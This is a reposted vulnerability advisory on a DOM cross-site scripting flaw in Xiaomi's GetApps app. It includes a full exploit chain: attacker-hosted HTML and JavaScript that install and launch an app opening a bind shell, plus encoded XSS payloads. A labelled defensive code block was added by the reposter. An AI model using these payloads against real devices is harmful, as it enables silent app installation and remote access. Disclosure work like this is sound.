Technical Advisory: Xiaomi 13 Pro Code Execution via GetApps DOM Cross-Site Scripting (XSS)

Summary

The GetApps Android application (com.xiaomi.mipicks) versions 30.4.1.0 and below are vulnerable to a DOM Cross-Site Scripting issue within a privileged WebView. Using this issue, it was possible to execute JavaScript against a privileged JavaScript Interface to install and open any application available in the GetApps application store.

Impact

If a malicious application were to be uploaded to the GetApps application store, then this issue could be used to install said application and execute arbitrary shell commands on the victim device.

Exploit

To successfully exploit this issue, two files must be hosted on an attacker’s web server:

  • index.html
  • yay.js

The contents of index.html is below:

<html>
<head>
<title>yaytitleyay</title>
</head>
<body>
<script type="text/javascript">
var yayhostyay = location.hostname; // gets host / domain, can also set this to a static value
var yayportyay = location.port // must be a port number of some sort, or let the script get the port number by itself
var yaypayloadyay = "{\"title\":\"look at my PoC!\",\"type\":\"yaytypeyay\\u0022\\u003e\\u003csvg onload\\u003d\\u0022javascript\\u003aj\\u003ddocument.createElement('script');j.src\\u003d'http\\u003a\\u002f\\u002f" + yayhostyay + "\\u003a" + yayportyay + "\\u002fyay.js';document.getElementsByTagName('head')[0].appendChild(j);\\u0022\\u003e\",\"subtitle\":\"brought to you by NCC Group\",\"tips\":\"also Pichu is awesome\",\"btnTips\":\"yayexploityay\"}"
var yayhyperlinkyay = "intent://browse?url=file%3A%2F%2Fintegral-dialog-page.html?integralInfo=" + encodeURIComponent(yaypayloadyay) + "#Intent;action=android.intent.action.VIEW;scheme=mimarket;end"
var a = document.createElement("a");
a.href = yayhyperlinkyay;
a.id = "yayidyay";
a.innerHTML = "YAYPOCYAY";
document.getElementsByTagName('body')[0].appendChild(document.createElement("h1"))
document.getElementsByTagName('h1')[0].appendChild(a);
</script>
</body>
</html>

The contents of yay.js is below:

const sleep = async (milliseconds) => {
    await new Promise(resolve => { return setTimeout(resolve, milliseconds) });
};

// Poll the installed-app list every 5 seconds until Sunfish appears, then open it
// through the privileged interface (the sleep sits inside the loop so it does not busy-spin)
const thePayloadYay = async () => {
    var yayflagyay = 1;
    while (yayflagyay == 1) {
        var yayinstalledappsyay = marketAPI.getInstalledApps({});
        var yayappslengthyay = yayinstalledappsyay.length;
        var yaycounteryay = 0;
        while (yaycounteryay != yayappslengthyay) {
            if (yayinstalledappsyay[yaycounteryay].packageName === "com.<redacted>.sunfish") {
                marketAPI.openApp({"pName": "com.<redacted>.sunfish"});
                yayflagyay = 0;
            }
            yaycounteryay = yaycounteryay + 1;
        }
        marketAPI.showToast({"content": "waiting for the app to be installed"});
        await sleep(5000);
    }
}

// Ask the privileged WebEvent interface to install the store listing for Sunfish
marketAPI.install({
    "extra_params": {
        "downloadImmediately": "true",
        "fromUntrustedHost": "false",
        "sourcePackage": "com.miui.home",
        "startDownload": "true",
        "callerPackage": "com.xiaomi.mipicks",
        "ext_apm_isColdStart": "false",
        "callerSignature": "88daa889de21a80bca64464243c9ede6",
        "launchWhenInstalled": "true",
        "ext_apm_timeSinceColdStart": "1362443",
        "senderPackageName": "com.xiaomi.mipicks",
        "entrance": "detail",
        "pageRef": "com.xiaomi.mipicks",
        "appClientId": "com.xiaomi.mipicks",
        "refs": "-detail/com.<redacted>.sunfish",
        "sid": "",
        "rId": 0,
        "ad": 0,
        "appStatusType": 0,
        "pName": "com.<redacted>.sunfish",
        "pos": "detailInstallBtn",
        "posChain": "detailInstallBtn",
        "newUser": true,
        "activedTimeInterval": 583925,
        "adExchangeFlag": 0,
        "_ir_": "8rj6UL-fpnYa7BCFmBSqp5jbHJSm_GgzL6bgn7GqAwc",
        "ext_apm_iconType": "static",
        "ext_apm_isHotTag": false
    },
    "ref": "_detailInstallBtn",
    "title": "Sunfish",
    "pName": "com.<redacted>.sunfish",
    "appId": 3004617,
    "appInfo": {
        "grantCode": 0,
        "openLinkGrantCode": 1,
        "voiceAssistTag": false,
        "commentable": false,
        "id": 3004617,
        "appId": 3004617,
        "packageName": "com.<redacted>.sunfish",
        "displayName": "Sunfish",
        "publisherName": "<redacted>",
        "versionName": "1.2.2",
        "versionCode": 9,
        "updateTime": 1694181164626,
        "apkSize": 3710211,
        "compressApkSize": 0,
        "icon": "AppStore/06c542c55a34b47d4a12a45bfe4187f5d8b5d8f10",
        "level1CategoryId": 30,
        "intlCategoryId": 30,
        "ads": 0,
        "adType": 1,
        "position": 0,
        "briefShow": "Help ensure the security of your Android applcation.",
        "briefUseIntro": false,
        "releaseKeyHash": "0e140764979f5c5c0c44fd526aae29e3"
    },
    "sid": "",
    "callBack": "marketAsyncCb.installCb"
});

thePayloadYay();

The target device should then use a web browser to browse to http://<attacker’s server>/index.html and click on the hyperlink present on the webpage. When this happens, the above JavaScript executes, which results in the application “Sunfish” being installed and opened on the device without the user’s consent.

Sunfish is a re-skinned version of Drozer, which starts a bind shell on the device’s network interfaces. From there, it is possible for the attacker to connect to Sunfish and execute arbitrary commands:

root@2ee5edd7a244:/# sunfish console connect --server <phone IP address>
Selecting 746aece8a83d73e2 (Xiaomi 2210132G 13)

[Sunfish ASCII-art banner]

sunfish Console (v2.4.4)
sunfish> shell
:/data/user/0/com.<redacted>.sunfish $ whoami
u0_a302
:/data/user/0/com.<redacted>.sunfish $ id
uid=10302(u0_a302) gid=10302(u0_a302) groups=10302(u0_a302),3003(inet),9997(everybody),20302(u0_a302_cache),50302(all_a302) context=u:r:untrusted_app_27:s0:c46,c257,c512,c768


Technical Details

Browsable Intent Details

The exported activity com.xiaomi.market.ui.JoinActivity can be launched via Browsable Intent. This activity executes different Java functions based on the contents of the incoming Browsable Intent. One of the functions, called handleBrowse(Uri), can launch a privileged WebView with a potentially dangerous JavaScript Interface. This function can be executed if the “data” within the Browsable Intent contains the following:

  • A “scheme” value of mimarket
  • A “host” value of browse

To limit potential attacks which can abuse the JavaScript Interface, the application will not allow handleBrowse(Uri) to launch the privileged WebView unless the URL is considered “safe”. The logic for assessing and validating URLs can be found in class com.xiaomi.market.util.UrlCheckUtilsKt method isUrlMatchLevel(String, HostLevel, boolean).

Below is a high-level description of which URLs are considered “safe”:

  • If the URL starts with https://, then the host value must match a whitelisted domain (the whitelist is kept internally within the application)
  • If the URL starts with file://, then the host and path values must match one of the files found in the directory /data/data/com.xiaomi.mipicks/files/web-res-XXXX on the device

Below is a code snippet of how a URL is passed from handleBrowse(Uri) to isUrlMatchLevel(String, HostLevel, boolean):

public class JoinActivity extends BaseActivity {
    …
    private void handleBrowse(Uri uri) {
        Intent targetIntent;
        …
        // The "url" query parameter is attacker-controlled via the Browsable Intent
        String queryParameter = uri.getQueryParameter("url");
        if (UrlCheckUtilsKt.isJsInterfaceAllowed(queryParameter)) {
            targetIntent = getTargetIntent(intFromIntent == 1 ? FloatWebActivity.class : CommonWebActivity.class);
            …
            targetIntent.putExtra("url", queryParameter);
            …
            startActivity(targetIntent);

public final class UrlCheckUtilsKt {
    public static final boolean isJsInterfaceAllowed(String str) {
        …
        boolean isUrlMatchLevel = isUrlMatchLevel(str, HostLevel.TRUSTED)
        …
    public static final boolean isUrlMatchLevel(String str, HostLevel level) {
        …
        boolean isUrlMatchLevel = isUrlMatchLevel(str, level, true)
        …
    public static final boolean isUrlMatchLevel(String str, HostLevel level, boolean z) {

If the URL is considered valid, then one of the following WebViews will be launched via startActivity(Intent):

  • com.xiaomi.market.ui.FloatWebActivity
  • com.xiaomi.market.ui.CommonWebActivity

As an example, the following Browsable Intent can be used to launch the exported activity com.xiaomi.market.ui.JoinActivity, open the privileged WebView com.xiaomi.market.ui.CommonWebActivity, and open the file /data/data/com.xiaomi.mipicks/files/web-res-XXXX/detail.html:

<a id="yayidyay" rel="noreferrer" href="intent://browse?url=file%3A%2F%2Fdetail.html#Intent;action=android.intent.action.VIEW;scheme=mimarket;end">YAYPOCYAY</a>

Below is a screenshot of the resulting detail.html page. It should be noted that the lack of content in the web page is intentional:


DOM Cross-Site Scripting (XSS)

The folder /data/data/com.xiaomi.mipicks/files/web-res-XXXX/ contained the following types of files:

  • HTML files – render basic HTML and load JavaScript files to render content
  • JavaScript files – the JavaScript files that are loaded by the HTML files

Most of the JavaScript files contained an integrated function to filter potentially dangerous characters. This is because some HTML files were required to take user input (via URL GET parameters) and fill out the HTML content based on that input.

However, the file integral-dialog-page-chunk.js did not filter out dangerous characters in one location, making a DOM Cross-Site Scripting (XSS) attack possible in the page integral-dialog-page.html.

Below is a Browsable Intent PoC which demonstrates this issue by executing the command alert(1) after loading the page integral-dialog-page.html:

<h1>
<a id="yayidyay" rel="noreferrer" href="intent://browse?url=file%3A%2F%2Fintegral-dialog-page.html?integralInfo=%7b%22%74%69%74%6c%65%22%3a%22%6c%6f%6f%6b%20%61%74%20%6d%79%20%50%6f%43%21%22%2c%22%74%79%70%65%22%3a%22%79%61%79%74%79%70%65%79%61%79%5c%75%30%30%32%32%5c%75%30%30%33%65%5c%75%30%30%33%63%73%76%67%20%6f%6e%6c%6f%61%64%5c%75%30%30%33%64%5c%75%30%30%32%32%6a%61%76%61%73%63%72%69%70%74%5c%75%30%30%33%61%61%6c%65%72%74%28%27%70%72%69%76%69%6c%65%67%65%64%20%6d%61%72%6b%65%74%41%50%49%3a%20%27%20%2b%20%6d%61%72%6b%65%74%41%50%49%29%5c%75%30%30%32%32%5c%75%30%30%33%65%22%2c%22%73%75%62%74%69%74%6c%65%22%3a%22%62%72%6f%75%67%68%74%20%74%6f%20%79%6f%75%20%62%79%20%4e%43%43%20%47%72%6f%75%70%22%2c%22%74%69%70%73%22%3a%22%61%6c%73%6f%20%50%69%63%68%75%20%69%73%20%61%77%65%73%6f%6d%65%22%2c%22%62%74%6e%54%69%70%73%22%3a%22%79%61%79%65%78%70%6c%6f%69%74%79%61%79%22%7d#Intent;action=android.intent.action.VIEW;scheme=mimarket;end">
        YAYPOCYAY</a>
</h1>

Decoded payload value:

file://integral-dialog-page.html?integralInfo={"title":"look at my PoC!","type":"yaytypeyay"><svg onload="javascript:alert(1)">","subtitle":"brought to you by NCC Group","tips":"also Pichu is awesome","btnTips":"yayexploityay"}
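As an added example (not code from the advisory or from GetApps; the real integral-dialog-page-chunk.js is not shown on this page), the JavaScript below reconstructs the kind of DOM sink that lets the decoded payload above break out of an attribute, next to the entity-encoding fix the other web-res files apply. It assumes the page JSON-decodes the integralInfo query parameter and builds markup from its fields by string concatenation; the field names come from the payload above, the function names are mine.

```javascript
// Added example, not GetApps code: reconstruction of the integralInfo sink.
// Assumption: the dialog page parses `integralInfo` as JSON and concatenates
// its fields into HTML. Function and constant names here are hypothetical.

// Extract and JSON-decode the integralInfo parameter from a page URL.
// Returns null when the parameter is absent or is not valid JSON.
function parseIntegralInfo(pageUrl) {
  const query = pageUrl.split('?').slice(1).join('?');
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    if (eq < 0) continue;
    if (decodeURIComponent(pair.slice(0, eq)) !== 'integralInfo') continue;
    try {
      return JSON.parse(decodeURIComponent(pair.slice(eq + 1)));
    } catch (e) {
      return null;
    }
  }
  return null;
}

// Vulnerable pattern: untrusted fields go straight into markup, so a `type`
// value containing `"><svg onload=...>` closes the attribute and adds an element.
function renderDialogUnsafe(info) {
  return '<div class="dialog" data-type="' + info.type + '">' +
         '<h2>' + info.title + '</h2>' +
         '<p>' + info.subtitle + '</p>' +
         '<button>' + info.btnTips + '</button></div>';
}

// Hardened pattern: entity-encode every untrusted field before it reaches the
// markup, so quotes and angle brackets render as text instead of being parsed.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderDialogSafe(info) {
  return '<div class="dialog" data-type="' + escapeHtml(info.type) + '">' +
         '<h2>' + escapeHtml(info.title) + '</h2>' +
         '<p>' + escapeHtml(info.subtitle) + '</p>' +
         '<button>' + escapeHtml(info.btnTips) + '</button></div>';
}

// Regression check: true when the rendered markup contains an element the
// template never defined (here, the injected <svg>).
function introducesElement(html, tagName) {
  return new RegExp('<' + tagName + '[\\s>]', 'i').test(html);
}

// Constructed input: the decoded PoC payload from the advisory, re-encoded the
// way the page would receive it in the integralInfo query parameter.
const POC_PAYLOAD = {
  title: 'look at my PoC!',
  type: 'yaytypeyay"><svg onload="javascript:alert(1)">',
  subtitle: 'brought to you by NCC Group',
  tips: 'also Pichu is awesome',
  btnTips: 'yayexploityay',
};
const POC_URL = 'file://integral-dialog-page.html?integralInfo=' +
  encodeURIComponent(JSON.stringify(POC_PAYLOAD));
```

Running parseIntegralInfo(POC_URL) through both renderers shows the unsafe one emitting a live <svg onload> element and the safe one emitting only escaped text.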

Below is a screenshot of the DOM XSS payload being executed on the device:


Privileged JavaScript Interface WebEvent

The previously mentioned privileged WebView loads the JavaScript Interface “WebEvent” (com.xiaomi.market.webview.WebEvent).

This JavaScript Interface contained two useful methods which could be executed via JavaScript:

  • install(string) – this method will install any application that is available on the GetApps store
  • openApp(string) – this method will find the launch intent for any installed application and run that intent, opening the specified application

Launching the WebView and Executing Against WebEvent

In order to execute JavaScript against the “WebEvent” JavaScript Interface, the integral-dialog-page.html page must be launched and user input must contain the appropriate JavaScript.

The following Browsable Intent can be used to launch the privileged WebView, load the page integral-dialog-page.html, and execute the JavaScript command alert(marketAPI). This shows that it is possible to execute arbitrary JavaScript against the privileged JavaScript Interface found at com.xiaomi.market.webview.WebEvent:

<h1>
<a id="yayidyay" rel="noreferrer" href="intent://browse?url=file%3A%2F%2Fintegral-dialog-page.html?integralInfo=%7b%22%74%69%74%6c%65%22%3a%22%6c%6f%6f%6b%20%61%74%20%6d%79%20%50%6f%43%21%22%2c%22%74%79%70%65%22%3a%22%79%61%79%74%79%70%65%79%61%79%5c%75%30%30%32%32%5c%75%30%30%33%65%5c%75%30%30%33%63%73%76%67%20%6f%6e%6c%6f%61%64%5c%75%30%30%33%64%5c%75%30%30%32%32%6a%61%76%61%73%63%72%69%70%74%5c%75%30%30%33%61%61%6c%65%72%74%28%27%70%72%69%76%69%6c%65%67%65%64%20%6d%61%72%6b%65%74%41%50%49%3a%20%27%20%2b%20%6d%61%72%6b%65%74%41%50%49%29%5c%75%30%30%32%32%5c%75%30%30%33%65%22%2c%22%73%75%62%74%69%74%6c%65%22%3a%22%62%72%6f%75%67%68%74%20%74%6f%20%79%6f%75%20%62%79%20%4e%43%43%20%47%72%6f%75%70%22%2c%22%74%69%70%73%22%3a%22%61%6c%73%6f%20%50%69%63%68%75%20%69%73%20%61%77%65%73%6f%6d%65%22%2c%22%62%74%6e%54%69%70%73%22%3a%22%79%61%79%65%78%70%6c%6f%69%74%79%61%79%22%7d#Intent;action=android.intent.action.VIEW;scheme=mimarket;end">
        YAYPOCYAY</a>
</h1>

Decoded payload value:

file://integral-dialog-page.html?integralInfo={"title":"look at my PoC!","type":"yaytypeyay"><svg onload="javascript:alert('privileged marketAPI: ' + marketAPI)">","subtitle":"brought to you by NCC Group","tips":"also Pichu is awesome","btnTips":"yayexploityay"}

Below is a screenshot of the above payload being executed:

Using this, it is possible to call the JavaScript Interface functions install(String) and openApp(String). To fully take advantage of this issue, an attacker would need to upload a malicious app to the GetApps store, then abuse this exploit to install that malicious application and launch it automatically.


Sunfish

To demonstrate the severity of this issue, the application “Sunfish” was uploaded to the GetApps store. Sunfish is a re-skinned copy of Drozer, which is a common tool used for penetration testing of Android devices. This version of Sunfish (Drozer) is also configured to start a bind shell when the application is launched.


Combining the Pieces

With all of the information above, the workflow for this exploit looks like the following:

  • A user with a Xiaomi 13 Pro browses to an attacker-controlled web server and clicks a hyperlink crafted by the attacker
  • The GetApps application is launched and the privileged WebView is launched
  • The DOM XSS issue is exploited to inject custom JavaScript into the privileged WebView
  • The attacker-controlled custom JavaScript executes commands against the “WebEvent” JavaScript Interface to install and open Sunfish
  • Sunfish is launched, and a bind shell is started
  • The attacker connects to the bind shell, which can then execute commands within the context of Sunfish

Disabled Browsers for Specific Versions of GetApps

During Pwn2Own Toronto 2023, Xiaomi temporarily implemented code into the GetApps application which would block the ability to launch JoinActivity via Browsable Intent. This code was later removed from GetApps after the Pwn2Own competition had concluded.

Below is a list of GetApps versions, their SHA256 hashes, and which browsers are prohibited from launching JoinActivity:

  • Version 30.2.7.0
    o   SHA256 – 4cf142334ed34c3705c2a30c3aba121861e57d8c5d1d8341f194ad4723dc5be8
    o   Browsers blocked:
        §   Xiaomi Browser (com.mi.globalbrowser)
        §   Android HTML Viewer (com.android.htmlviewer)
        §   Android NFC (com.android.nfc)
        §   Google Chrome (com.android.chrome)
  • Version 30.2.8.0
    o   SHA256 – 7637f7fe3dd1c53e072069faabda59683272115e561fa5e400bd0586093accd1
    o   Browsers blocked:
        §   Xiaomi Browser (com.mi.globalbrowser)
        §   Android HTML Viewer (com.android.htmlviewer)
        §   Android NFC (com.android.nfc)
        §   Google Chrome (com.android.chrome)
        §   Opera Browser (com.opera.browser)
        §   Yandex Browser (com.yandex.browser)

The application logic to block the above browsers can be seen in the below code snippet, taken from GetApps version 30.2.7.0.

The value matchSpecialCallingPackage is set to true if the Browsable Intent was sent from one of the blacklisted browsers listed above. When matchSpecialCallingPackage is true, the method handleIntent() always returns before the handleBrowse(Uri uri) function can be executed.

public class JoinActivity extends BaseActivity {

    private void handleIntent() {
        …
        boolean matchSpecialCallingPackage = matchSpecialCallingPackage();
        …
        if (matchSpecialCallingPackage) {
            if (!TextUtils.equals(targetPage, PAGE_DETAILS) && !TextUtils.equals(targetPage, "detail") && !TextUtils.equals(targetPage, PAGE_LAUNCH_DETAIL)) {
                launchTargetActivity(MarketTabActivity.class);
            } else {
                handleDetails(intent, scheme, targetPage);
            }
            MethodRecorder.o(9268);
            return;
        }
        …
        if (TextUtils.equals(targetPage, PAGE_BROWSE)) {
            handleBrowse(data);
            MethodRecorder.o(9268);
            return;
        }

    private boolean matchSpecialCallingPackage() {
        …
        boolean contains = sBlackPkgArrayList.contains(getCallingPackage());
        …
        return contains;
    }

Recommendation

Xiaomi has stated that this issue was resolved in GetApps version 32.0.0.1. Users should update their GetApps application to at least that version.

Vendor Communication

2023-10-25 – Exploit demonstrated at Pwn2Own Toronto 2023, exploit details handed over to Zero Day Initiative (ZDI)

2023-11-09 – ZDI reported vulnerability to Xiaomi

2024-05-01 – Coordinated public release of advisory

Note: Xiaomi has not assigned a CVE for this issue. When ZDI worked with Xiaomi to patch this issue, Xiaomi informed ZDI they would assign a CVE, but never followed through. So instead, ZDI has assigned the CVE number CVE-2024-4406 for this issue.

Originally published by Ken Gannon: Technical Advisory: Xiaomi 13 Pro Code Execution via GetApps DOM Cross-Site Scripting (XSS)

Reposted by admin on 27 September 2024, 20:49.